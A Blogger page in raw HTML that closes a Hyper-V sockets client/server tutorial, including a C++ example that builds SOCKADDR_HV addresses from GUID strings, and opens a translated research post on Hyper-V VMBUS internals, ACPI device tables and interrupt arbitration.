<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Replace code</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//iResult = bind(ListenSocket, result->ai_addr, (int)result->ai_addrlen); - orig.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">iResult = bind(ListenSocket, hints.ai_addr, (</span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">int</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)hints.ai_addrlen);</span></div>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 36pt; margin-top: 0pt; text-indent: -18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Compile the solution. You get ClientExample.exe and ServerExample.exe. Run ServerExample on the host and ClientExample inside the guest virtual machine. Enter “test” in ClientExample.exe and watch it appear as the output of ServerExample.</span></div>
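<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Both the client and the server above fill a SOCKADDR_HV by hand (Family, VmId, ServiceId). The following portable C++ is an added example, not code from the article, its GitHub repository or the Microsoft sample: it redeclares the GUID and SOCKADDR_HV layouts and the AF_HYPERV value as they appear in guiddef.h and hvsocket.h (an assumption made so it builds without the Windows SDK), parses a GUID string the way CLSIDFromString does, fills the address, and prints the 11 DEFINE_GUID arguments for a GUID, which is how the server's step 1 encodes HV_GUID_PARENT.</span></div>

```cpp
// Added example (not the article's or the Microsoft sample's code): a portable model of
// the Hyper-V socket address that the client/server steps fill by hand. Struct layouts and
// AF_HYPERV mirror guiddef.h / hvsocket.h and are redeclared here (assumption) so the file
// compiles without the Windows SDK.
#include <cctype>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <string>

struct Guid {                 // same field layout as GUID in guiddef.h
    uint32_t Data1;
    uint16_t Data2;
    uint16_t Data3;
    uint8_t  Data4[8];
};

constexpr uint16_t kAfHyperV = 34;   // AF_HYPERV in hvsocket.h

struct SockaddrHv {           // same layout as SOCKADDR_HV in hvsocket.h (36 bytes)
    uint16_t Family;          // must be AF_HYPERV
    uint16_t Reserved;        // must be zero
    Guid     VmId;            // target partition, e.g. HV_GUID_ZERO or HV_GUID_PARENT
    Guid     ServiceId;       // the GUID registered under GuestCommunicationServices
};

// Well-known VmIds used by the article, in string form.
const char* const kHvGuidZero   = "{00000000-0000-0000-0000-000000000000}";
const char* const kHvGuidParent = "{a42e7cda-d03f-480c-9cc2-a4de20abb878}";

// Read `len` hex digits of `s` starting at `pos`; false on a short or non-hex field.
static bool HexValue(const std::string& s, size_t pos, size_t len, uint64_t& out) {
    out = 0;
    for (size_t i = pos; i < pos + len; ++i) {
        if (i >= s.size() || !std::isxdigit(static_cast<unsigned char>(s[i]))) return false;
        char c = static_cast<char>(std::tolower(static_cast<unsigned char>(s[i])));
        out = (out << 4) | static_cast<uint64_t>(c <= '9' ? c - '0' : c - 'a' + 10);
    }
    return true;
}

// Parse "{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}" (braces optional, case-insensitive),
// the text format CLSIDFromString accepts in the server code.
bool ParseGuid(const std::string& text, Guid& g) {
    std::string s = text;
    if (s.size() == 38 && s.front() == '{' && s.back() == '}') s = s.substr(1, 36);
    if (s.size() != 36 || s[8] != '-' || s[13] != '-' || s[18] != '-' || s[23] != '-')
        return false;
    uint64_t v;
    if (!HexValue(s, 0, 8, v)) return false;   g.Data1 = static_cast<uint32_t>(v);
    if (!HexValue(s, 9, 4, v)) return false;   g.Data2 = static_cast<uint16_t>(v);
    if (!HexValue(s, 14, 4, v)) return false;  g.Data3 = static_cast<uint16_t>(v);
    // The last two groups (4 + 12 hex digits) are eight single bytes, in text order.
    const size_t bytePos[8] = {19, 21, 24, 26, 28, 30, 32, 34};
    for (int i = 0; i < 8; ++i) {
        if (!HexValue(s, bytePos[i], 2, v)) return false;
        g.Data4[i] = static_cast<uint8_t>(v);
    }
    return true;
}

// Canonical lower-case braced form; round-trips ParseGuid.
std::string FormatGuid(const Guid& g) {
    char buf[40];
    std::snprintf(buf, sizeof buf, "{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}",
                  g.Data1, g.Data2, g.Data3, g.Data4[0], g.Data4[1], g.Data4[2],
                  g.Data4[3], g.Data4[4], g.Data4[5], g.Data4[6], g.Data4[7]);
    return buf;
}

// The 11 numeric DEFINE_GUID arguments (one 32-bit, two 16-bit, eight 8-bit values):
// turns a PowerShell-generated GUID into the form used by the server's step 1.
std::string DefineGuidArgs(const Guid& g) {
    char buf[128];
    std::snprintf(buf, sizeof buf, "0x%x, 0x%x, 0x%x, 0x%x, 0x%x, 0x%x, 0x%x, 0x%x, 0x%x, 0x%x, 0x%x",
                  g.Data1, g.Data2, g.Data3, g.Data4[0], g.Data4[1], g.Data4[2],
                  g.Data4[3], g.Data4[4], g.Data4[5], g.Data4[6], g.Data4[7]);
    return buf;
}

// Fill a SOCKADDR_HV like the client/server steps; false if either GUID string is malformed.
bool MakeHvAddress(const std::string& vmId, const std::string& serviceId, SockaddrHv& a) {
    std::memset(&a, 0, sizeof a);          // like ZeroMemory(&clientService, ...); Reserved = 0
    a.Family = kAfHyperV;
    return ParseGuid(vmId, a.VmId) && ParseGuid(serviceId, a.ServiceId);
}

int main() {
    SockaddrHv addr;
    // Service GUID taken from the article's server code.
    if (MakeHvAddress(kHvGuidZero, "{b1d00d3e-fe10-4570-ad62-7648779d7a1b}", addr)) {
        std::printf("sizeof(SOCKADDR_HV) = %zu\n", sizeof addr);
        std::printf("VmId      = %s\n", FormatGuid(addr.VmId).c_str());
        std::printf("ServiceId = %s\n", FormatGuid(addr.ServiceId).c_str());
    }
    Guid parent;
    if (ParseGuid(kHvGuidParent, parent))
        std::printf("DEFINE_GUID(HV_GUID_PARENT, %s);\n", DefineGuidArgs(parent).c_str());
    return 0;
}
```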
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="241" src="https://lh4.googleusercontent.com/f71qOCAcLyy_MGc9_N8t-dMxyRyvQ1VGqPCIjMfFEYUC5STCtsJu9WOWQJE3wjrlbhxvJh2gUUqmz_kQMuGj5FVHVf7848nPlYqMWstBZICXr0eJmhDHYGYnZmy1S2TPXw3dTJAtBPcQHUPHFQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="350" /></span></div>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> After you register the service you can run the applications with plain user privileges on the host or in the virtual machine. They work like ordinary network applications and need no special permissions.</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> P.S. If you use one of the existing GUIDs as ServiceID:</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 7FDFD0EA-CEA8-4576-92D6-E072DDD2C422 - Machine Provisioning Service</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ACEF5661-84A1-4E44-856B-6245E69F4620 - Host Compute Service</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 999E53D4-3D5C-4C3E-8779-BED06EC056E1 - VM Session Service 1</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> A5201C21-2770-4C11-A68E-F182EDB29220 - VM Session Service 2</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> you don't need administrative privileges to use Hyper-V sockets, because no new registry entry has to be created.</span></div>
<div style="text-align: left;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><br /></span></div>
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Sources</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/make-integration-service" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/make-integration-service</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<a href="http://www.askyb.com/windows-socket/windows-socket-example-tcp-client-and-server" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://www.askyb.com/windows-socket/windows-socket-example-tcp-client-and-server</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://w4mhi.wordpress.com/complete-hyper-v-socket-client-code/" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://w4mhi.wordpress.com/complete-hyper-v-socket-client-code/</span></a><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - very good article. But code compiles with errors.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://github.com/gerhart01/HyperV-sockets" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/HyperV-sockets</span></a><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - source code from article.</span></div>
</li>
</ol>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-63526309886965298032015-10-22T12:01:00.002-07:002015-10-31T10:54:13.998-07:00Hyper-V internals<div dir="ltr" style="text-align: left;" trbidi="on">
<b style="font-weight: normal;"></b><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: justify;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Great thanks to ERNW for the translation of the article!</span></b></span></b><br />
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></b> </span></b><br />
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(Original article was published </span></b></span></b><span style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;"><span style="font-weight: normal;">on</span></span></span><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><b> </b>https://xakep.ru/2014/11/24/research-hyper-v and https://xakep.ru/2015/01/05/hyper-v-research-part-2)</span></b></span></b><br />
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><br /></span></b></span></b>
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Root-section (parent partition, root OS) - Windows Server 2012 R2 with the included component of Hyper-V;</span></b></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: justify;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Guest operating systems - virtual machine Hyper-V installed Windows Server 2012 R2;</span></b></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: justify;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">TLFS – Hypervisor Top-Level Functional Specification: Windows Server 2012 R2;</span></b></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: justify;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">LIS – Linux Integration Services</span></b></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Finding a bug, which later received the number MS13-092 (error component Hyper-V Windows Server 2012 allows you to send a hypervisor in BSOD from the guest operating system or run arbitrary code in other guest operating systems which are running on a vulnerable host server), it was very unpleasant surprise for Microsoft Engineers. Before that, for almost three years, no one has discovered a vulnerability in Hyper-V. It was only the MS10-102, which were found at the end of 2010. During those four years, the popularity of cloud services increased greatly, and researchers are more and more interested in security hypervisor underlying cloud systems. (Another bug MS15-042 was fixed but there is no detailed overview of this).</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">However, the number of publicly available work is low: the researchers are reluctant to spend their time exploring such complex and poorly documented architectural solutions. This article does not describe the specific vulnerabilities of the hypervisor, but it should shed light on the inner workings of Hyper-V, and thereby partially simplify future research. </span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This article will describe some features of the hypervisor, in particular the component of the vmbus message processing mechanism using the steal a hypervisor mechanism. (Before reading the article, it is recommended to get acquainted with the report from ERNW </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><a href="http://goo.gl/1Cvotv" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://goo.gl/1Cvotv</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)<b>,</b> «Hyper-V debugging for beginners» </span></b><span style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(http://hvinternals.blogspot.com/2015/10/hyper-v-debugging-for-beginners.html)</span></span><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, and Hypervisor TLFS (http://goo.gl/9dISj7</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; 
font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At the time of writing the article the used Hyper-V server and guest OS was Windows Server 2012 R2 Update 1 (machine type-1 Generation), but to reflect some of the features of the components we´ve used other versions of the Windows operating system, which will be stated in this article. For a test environment, you have to deploy the VMware Workstation 12.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1.VMBUS</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In a nutshell the VMBUS is a technology of interaction between the guest operating systems and root OS accordingly.</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are components in the guest and root OS that implements this interaction through the interfaces provided by the hypervisor and described in TLFS 4.0(a). Microsoft developed the components for Linux-like guest operating systems, which are already integrated into the kernel (</span><a href="http://www.microsofttranslator.com/bv.aspx?from=ru&to=en&a=https%3A%2F%2Fgithub.com%2FLIS" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https:/github. com/LIS</span></a><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></b></div>
<b style="font-weight: normal;">
</b><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Starting with Windows Server 2008, the Windows kernel functions were optimized for the operating system in a virtual environment Hyper-V. For comparison, in the core of Windows Server 2008 (x64) are 25 functions implemented with the prefix Hvl, which identifies them as belonging to a library to integrate with the hypervisor. Windows Server 2012 R2 has 109 Hvl-functions already. Windows Server 2016 TP2 has 12 Hvi-functions and 230 Hvl-functions.</span></b></div>
<b style="font-weight: normal;">
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Consider, how the components of VMBUS interacts with the hypervisor, root and guest OS. First look into the source code of LIS and see that the VMBUS is a device which supports ACPI. ACPI devices can be viewed by using the ACPI Utility tool, included in the AIDA64 version 3. XX (later it was removed). With its help in SB_.PCI0.SBRG it detected 2 devices: VMB8 and VMBS.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="117" src="https://lh3.googleusercontent.com/gPm8ERoifcsuAEDO97n-gSCIeKhvRNI6TVyHXhU18UosfbWYlcsXAmjpBCJ1kIrdLkVg9ixwPig6m0T6Pqh--OSZL5y-nxdzTOeWAhrPqi4JPe7tIVgBjBb1aidU5QsFjUMGImeeeXe7f8oq" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="138" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dump ACPI DSDT table that contains information on peripheral devices and functions of the hardware platform, using the same tools and ACPI Tool to decompile AML-disassembler (http://goo.gl/1pOZPX) in ASL. We obtain:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="360" src="https://lh4.googleusercontent.com/HcVlMnR5JJOgIRu3hbmFILy4L736a-cYSt9b8Nb0f7vP7vcJaHVvrwzdVvs0TYe27aIe3Si-0Bidwl6MY9ol2gzHQv843iv-3QWNFZfHaBDjwECyN-hM5rArrNdrypT64YWMganU7TCAHeKQ" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="560" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A superficial reading of ACPI Specification 5.0 made it clear that if the guest OS is Windows 6.2 and higher, the device will consume VMB8, otherwise VMBS. The only difference between these devices is the presence of an object _UID (UniqID), which is present in the VMB8. According to the ACPI specification, the presence of that object in the table is optional and is only required if the device can not present to operating system permanent unique ID. Also became a known resources that used by device - interrupt 5 and 7.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For comparison, in the virtual machine type Generation 2 there are only the devices VMBS placed in _SB_. VMOD. VMBS, (but with the object _UID) which using only interrupt 5:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="134" src="https://lh6.googleusercontent.com/kGbnDGF34f7AzW6H1VVUDk30482wGhcdkLt7DObx5Y9VOZCKClG6TmSM1sJ-WGAAxyo61Sih0-RlVCbYWGUHIqg5Q0rVH_ykPloB8aL4LMUKq2jucfCekOUTmcIqBU5vjRHiNjAjJpLlhs56" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="398" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Routines, that dispatch interrupts, register in interrupt dispatch table (IDT). Meanwhile we found on ACPI DSDT IRQ 5 and 7 that the handlers in the IDT having no direct connection, and to compare its interruption handler, Windows uses the referee interrupts (generally, there are several classes of arbitrators, in addition IRQ, - DMA, I / O, memory). All about the arbitrators can be found in the MSDN blog (http://goo.gl/FuvG4R, http://goo.gl/V3UV8e, http://goo.gl/h1vXaf)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Information about registered arbitrators can be seen in WinDBG with the command !acpiirqarb.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !acpiirqarb – </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">for the Guest Windows Server 2012 R2 Gen1:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="161" src="https://lh5.googleusercontent.com/Qb6ZO0J21iNtEcPoBRbYrb3qSXQndRKhxJqLcDzR0TvFPTAGZ0PRjg3zzG0LuZfDqDfbcWUjgBxkURtcl3cVKPA_X_-i55eIvFFKHsI6OlixowFsDLbf5OlmuwwC3VswwSOw7yYFGt6OEkwJ" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="571" /></span></div>
